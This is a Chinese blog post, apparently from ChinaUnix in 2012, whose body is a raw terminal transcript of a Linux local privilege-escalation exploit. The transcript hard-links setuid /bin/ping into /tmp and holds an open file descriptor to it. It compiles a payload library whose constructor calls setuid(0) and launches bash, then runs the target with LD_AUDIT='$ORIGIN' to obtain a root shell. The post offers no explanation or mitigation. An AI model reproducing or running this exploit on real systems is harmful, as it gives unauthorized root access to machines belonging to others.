Chinaunix首页 | 论坛 | 博客
  • 博客访问: 28535
  • 博文数量: 4
  • 博客积分: 67
  • 博客等级: 民兵
  • 技术积分: 45
  • 用 户 组: 普通用户
  • 注册时间: 2012-08-24 21:25
文章分类
文章存档

2012年(4)

我的朋友

分类: LINUX

2012-08-24 23:08:34

[Star@localhost tmp]$ ls -ld /tmp/ drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/ [Star@localhost tmp]$ cd /tmp/ [Star@localhost tmp]$ mkdir exploit [Star@localhost tmp]$ ln /bin/ping /tmp/exploit/target [Star@localhost tmp]$ exec 3< /tmp/exploit/target [Star@localhost tmp]$ ls -l /proc/$$/fd/3 lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target [Star@localhost tmp]$ rm -fr /tmp/exploit/ [Star@localhost tmp]$ ls -l /proc/$$/fd/3 lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted) [Star@localhost tmp]$ cat > payload.c void __attribute__((constructor)) init() { setuid(0); system("/bin/bash"); } [Star@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c [Star@localhost tmp]$ ls -l /tmp/exploit -rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit [Star@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 [Star@localhost tmp]# whoami root
阅读(2018) | 评论(0) | 转发(0) |
0

上一篇:学习shell的起步!~~

下一篇:bind9管理手册

给主人留下些什么吧!~~